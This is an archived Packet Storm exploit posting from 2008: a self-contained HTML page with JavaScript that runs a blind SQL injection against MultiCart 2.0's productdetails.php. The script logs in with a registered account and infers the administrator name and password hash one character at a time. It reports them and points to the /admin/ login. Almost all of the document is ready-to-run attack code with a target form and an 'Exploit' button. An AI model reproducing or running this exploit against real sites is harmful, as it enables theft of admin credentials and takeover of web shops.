multicart-blindsql.txt

2008-02-21T00:00:00
ID PACKETSTORM:63868
Type packetstorm
Reporter t0pp8uzz
Modified 2008-02-21T00:00:00

Description

                                        
                                            `<html>  
<head>  
<style type="text/css">  
<!--  
.style1{color: #CC0000}  
.style2 { color: #000000; font-size: 12px;}  
.style3 {color: #FF0000; font-weight: bold; font-size: 12px; }  
.style4 {color: #FF0000; font-size: 10px;}  
-->  
</style>  
<title>MultiCart 2.0 Remote SQL Injection Vulnerbility</title>  
<script language="Javascript" type="text/javascript">  
/*  
-------------------------------------------------------------------------------  
- MultiCart Blind SQL Injection Exploit (productdetails.php) -  
- Info ----------------------------------------------------------------------  
- SAVE AS exploit.HTML and RUN in FIREFOX -----------------  
- Author: t0pP8uZz & xprog -------------------------------------------  
- Exploit Coded By t0pP8uZz -----------------------------------------  
- Site: h4ck-y0u.org / milw0rm.com ---------------------------------  
------------------------------------------------------------------------------  
- Needs Registration First! ------------------------------------  
- Peace --------------------------------------------------------------------  
------------------------------------------------------------------------------  
*/  
  
var site, user, pass, tbl, pid, res = "";  
  
function Start() {  
  
site = document.getElementById("site").value;  
user = document.getElementById("user").value;  
pass = document.getElementById("pass").value;  
tbl = document.getElementById("tbl").value;  
pid = document.getElementById("pid").value;  
  
Login();  
Main(1, 48);  
}  
  
function Main(substr, num) {  
  
var url = site+"/productdetails.php?productid="+pid+"%20and%20ascii(substring((SELECT concat(admin_name,0x3a,admin_password) FROM "+tbl+"),"+substr+",1))="+num+"/*";  
  
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");  
  
var xmlhttp = new XMLHttpRequest();  
  
xmlhttp.onreadystatechange = function() {  
  
if(xmlhttp.readyState == 4) {  
  
var content = xmlhttp.responseText;  
if(content.match(/doesn't exist/i)) { alert("Table '"+tbl+"' Doesnt Exist! Try Another.."); return false; }  
  
var ele = document.getElementById("output");  
if(!content.match(/SQL syntax/i)) { res += String.fromCharCode((num)); ele.value = res; num = 48; substr++; }  
else { if(num == 59) { num = 96; } else { num++; }}  
  
if(res.match(":")) {   
var check = res.split(":");  
if(check[1].length >= 32) { alert("Site Exploited! Admin Details: "+res); return true;}  
}  
Main(substr, num);  
}  
};  
xmlhttp.open("GET", url, true);  
xmlhttp.send(null);  
};  
  
  
function Login() {  
  
var data = 'txtUserName='+user+'&txtPassword='+pass+'&loginbox=+';  
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");  
  
try {  
var xmlhttp = new XMLHttpRequest();  
}  
catch(e) { alert("Use Firefox!\n\n\nError: " + e.description); }  
  
xmlhttp.open("POST", site + "/index.php", true);  
  
xmlhttp.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9");  
xmlhttp.setRequestHeader("Content-Length", data.length);  
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  
  
xmlhttp.send(data);  
};  
</script>  
</head>  
<body>  
<p class="style1">- MultiCart 2.0 Remote Blind SQL Injection Vulnerbility -</p>  
<p class="style2">Site: <input type="text" id="site" /> (URL to multicart site ie: http://www.site.com/multicart)</p>  
<p class="style2">Table: <input type="text" id="tbl" /> (settings table name, default: "multicart_settings" others used: "mc_settings", "settings")</p>  
<p class="style2">User: <input type="text" id="user" /> (Register on the site first, then enter username here)</p>  
<p class="style2">Pass: <input type="text" id="pass" /> (Register on the site first, then enter password here)</p>  
<p class="style2">PID: <input type="text" id="pid" /> (a valid product ID)</p>  
<p class="style2"><input type="button" onclick="Start();" id="button" value="Exploit" /></p>  
<p class="style3">Output: <input type="text" id="output" size="100" /></p>  
<p class="style2">Notes: MultiCart uses the MD5 algorithms, The admin login is at /admin/</p>  
<p class="style4">Coded By t0pP8uZz - h4ck-y0u.org</p>  
</body>  
</html>  
  
`